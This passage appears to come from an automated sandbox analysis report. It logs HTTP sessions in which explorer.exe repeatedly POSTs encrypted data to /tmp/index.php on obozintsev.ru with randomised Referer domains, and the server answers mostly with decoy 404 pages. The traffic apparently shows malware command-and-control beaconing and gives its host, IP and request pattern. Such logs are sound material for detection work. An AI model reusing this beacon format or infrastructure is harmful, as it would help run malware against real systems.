                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu{QJf'Mn@ :6A@{M{Ov]XB9C6)\*ef(/LxtAs0*Sip_52J
                                                                                                                        Nov 30, 2024 11:13:29.204399109 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:28 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        31192.168.2.449840189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:29.328526020 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://reqhcetbeojgkny.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 279
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:29.328557014 CET279OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 5f 07 d0 8e
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu_P2E'~_@tz/'>Hb#PV92>T`42$dY]ZGS%ztGQ5Nsq=>Bgb%=0"
                                                                                                                        Nov 30, 2024 11:13:31.076697111 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:30 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        32192.168.2.449842189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:31.237323999 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://nsgtchrbqowj.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 355
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:31.237354040 CET355OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 59 32 e2 e0
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuY2Tn_O}\zK!2U|-z?zA0#?|[I^p5OXz[LM;L2-kK5vkD]\3hBJ8:1e
                                                                                                                        Nov 30, 2024 11:13:33.046477079 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:32 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        33192.168.2.449847189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:33.190927982 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://kjjcaejlhnascj.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 318
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:33.191423893 CET318OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 77 0c ba f2
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuw2o\v_dGnt04-;G+_K1tI@EJe?~k~Q7+/Aq(1U>;9zl>?]?@FmD"@(
                                                                                                                        Nov 30, 2024 11:13:34.992533922 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:34 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        34192.168.2.449853189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:35.123045921 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ansopymmtehxip.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 319
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:35.123065948 CET319OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 31 5e f9 95
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[*k,vu1^NXyeb=;p,<Z*?[HSC<=>4iKBmzO8S.4;{8DC8sD|YFBM/6_>|
                                                                                                                        Nov 30, 2024 11:13:36.925482988 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:36 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        35192.168.2.449859189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:37.061934948 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://wyqtmqrstxfymqsq.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 183
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:37.062011957 CET183OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 4e 3b fc a1
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[+k,vuN;9[Pq5^z3?zs2_WV[J[RXvY5HGM8!w7DEbW~
                                                                                                                        Nov 30, 2024 11:13:39.051615000 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:38 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        36192.168.2.449865189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:39.192209005 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ngsmolqmjlkr.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 177
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:39.192223072 CET177OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 28 6b 2c 90 f5 76 0b 75 5b 01 c6 ff
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[(k,vu[ZG6~^cwwA6wvW?&P<?Tdev:jI=Kd
                                                                                                                        Nov 30, 2024 11:13:41.033102989 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:40 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        37192.168.2.449869189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:41.157958984 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://xwimesajyti.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 363
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:41.157991886 CET363OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 29 6b 2c 90 f5 76 0b 75 58 0e ff 9b
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[)k,vuXxESuGn7v&6#W6;x\dN)7_!:4K?rB)lZZ.eD^0ON!Uwd@*ml5&]
                                                                                                                        Nov 30, 2024 11:13:42.994563103 CET194INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:42 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16
                                                                                                                        Data Ascii: #\6cB1I!#1Uc;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        38192.168.2.449881189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:45.809374094 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://qasfskgmelreo.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 318
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:45.809393883 CET318OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 29 6b 2c 90 f4 76 0b 75 7e 41 a7 e7
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA ,[)k,vu~A)jhs+/<5odej$yQ)]3*)~P>=/8,|Sm*Y(3Fw{8dqcAX&-kR4L
                                                                                                                        Nov 30, 2024 11:13:47.602294922 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:47 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        39192.168.2.449887189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
